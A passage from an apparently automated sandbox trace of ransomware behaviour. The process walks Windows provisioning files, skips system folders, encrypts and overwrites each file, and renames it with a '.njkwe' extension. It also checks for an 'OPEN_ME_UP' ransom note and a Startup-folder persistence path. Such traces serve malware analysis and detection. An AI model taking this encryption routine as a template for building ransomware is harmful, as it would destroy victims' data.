(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\297__connections_cellular_t-mobile netherlands (netherlands)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.070] GetTickCount () returned 0x1153d92 [0078.070] GetTickCount () returned 0x1153d92 [0078.070] GetTickCount () returned 0x1153d92 [0078.070] GetTickCount () returned 0x1153d92 [0078.070] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.071] GetProcessHeap () returned 0xbe0000 [0078.071] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.071] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2e7, lpOverlapped=0x0) returned 1 [0078.072] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.072] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2e7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2e7, lpOverlapped=0x0) returned 1 [0078.073] GetProcessHeap () returned 0xbe0000 [0078.073] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.073] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.073] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.073] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.073] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.073] CloseHandle (hObject=0x43c) returned 1 [0078.073] GetProcessHeap () returned 0xbe0000 [0078.073] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.073] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 198 [0078.073] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\297__connections_cellular_t-mobile netherlands (netherlands)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\297__Connections_Cellular_T-Mobile Netherlands (Netherlands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\297__connections_cellular_t-mobile netherlands (netherlands)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.074] GetProcessHeap () returned 0xbe0000 [0078.074] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.074] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b12dd6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b12dd6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b12dd6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml", cAlternateFileName="298__C~1.PRO")) returned 1 [0078.074] lstrcmpiW (lpString1="298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.074] lstrcmpiW (lpString1="298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.074] lstrcmpiW (lpString1="298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.074] lstrcmpiW (lpString1="298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.074] lstrcmpiW (lpString1="298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.074] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml") returned 169 [0078.074] StrStrIW (lpFirst="298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.074] lstrcmpW (lpString1="298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.074] lstrcmpW (lpString1="298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.074] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\298__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.074] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\298__connections_cellular_vodafone nl (netherlands)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.075] GetTickCount () returned 0x1153da2 [0078.075] GetTickCount () returned 0x1153da2 [0078.075] GetTickCount () returned 0x1153da2 [0078.075] GetTickCount () returned 0x1153da2 [0078.075] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.075] GetProcessHeap () returned 0xbe0000 [0078.075] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.075] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x35d, lpOverlapped=0x0) returned 1 [0078.077] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.077] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x35d, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x35d, lpOverlapped=0x0) returned 1 [0078.077] GetProcessHeap () returned 0xbe0000 [0078.077] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.077] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.077] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.077] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.077] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.077] CloseHandle (hObject=0x43c) returned 1 [0078.077] GetProcessHeap () returned 0xbe0000 [0078.077] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.077] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0078.078] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\298__connections_cellular_vodafone nl (netherlands)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\298__Connections_Cellular_Vodafone NL (Netherlands)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\298__connections_cellular_vodafone nl (netherlands)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.078] GetProcessHeap () returned 0xbe0000 [0078.078] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.078] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90b12dd6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90b12dd6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90b12dd6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="299__C~1.PRO")) returned 1 [0078.078] lstrcmpiW (lpString1="299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.078] lstrcmpiW (lpString1="299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.078] lstrcmpiW (lpString1="299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.078] lstrcmpiW (lpString1="299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.078] lstrcmpiW (lpString1="299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.078] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.079] StrStrIW (lpFirst="299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.079] lstrcmpW (lpString1="299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.079] lstrcmpW (lpString1="299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.079] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\299__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.079] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\299__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.079] GetTickCount () returned 0x1153da2 [0078.079] GetTickCount () returned 0x1153da2 [0078.079] GetTickCount () returned 0x1153da2 [0078.079] GetTickCount () returned 0x1153da2 [0078.079] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.079] GetProcessHeap () returned 0xbe0000 [0078.079] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.079] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0078.080] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.080] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0078.081] GetProcessHeap () returned 0xbe0000 [0078.081] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.081] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.081] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.081] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.082] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.082] CloseHandle (hObject=0x43c) returned 1 [0078.082] GetProcessHeap () returned 0xbe0000 [0078.082] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.082] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\299__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\299__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\299__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.083] GetProcessHeap () returned 0xbe0000 [0078.083] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.083] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901af563, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901af563, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901af563, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="29__CO~1.PRO")) returned 1 [0078.083] lstrcmpiW (lpString1="29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.083] lstrcmpiW (lpString1="29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.083] lstrcmpiW (lpString1="29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.083] lstrcmpiW (lpString1="29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.083] lstrcmpiW (lpString1="29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.083] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml") returned 162 [0078.083] StrStrIW (lpFirst="29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.083] lstrcmpW (lpString1="29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.083] lstrcmpW (lpString1="29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.083] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\29__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.083] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\29__connections_cellular_tele.ring (austria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.084] GetTickCount () returned 0x1153da2 [0078.084] GetTickCount () returned 0x1153da2 [0078.084] GetTickCount () returned 0x1153da2 [0078.084] GetTickCount () returned 0x1153da2 [0078.084] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.084] GetProcessHeap () returned 0xbe0000 [0078.084] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.084] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x34c, lpOverlapped=0x0) returned 1 [0078.085] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.085] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x34c, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x34c, lpOverlapped=0x0) returned 1 [0078.085] GetProcessHeap () returned 0xbe0000 [0078.085] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.085] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.085] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.085] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.086] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.086] CloseHandle (hObject=0x43c) returned 1 [0078.086] GetProcessHeap () returned 0xbe0000 [0078.086] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.086] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0078.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\29__connections_cellular_tele.ring (austria)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\29__Connections_Cellular_Tele.ring (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\29__connections_cellular_tele.ring (austria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.087] GetProcessHeap () returned 0xbe0000 [0078.087] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.087] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900ca6de, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x900ca6de, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x900ca6de, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="2__CON~1.PRO")) returned 1 [0078.087] lstrcmpiW (lpString1="2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.087] lstrcmpiW (lpString1="2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.087] lstrcmpiW (lpString1="2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.087] lstrcmpiW (lpString1="2__Connections_Cellular_Djezzy (Algeria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.087] lstrcmpiW (lpString1="2__Connections_Cellular_Djezzy 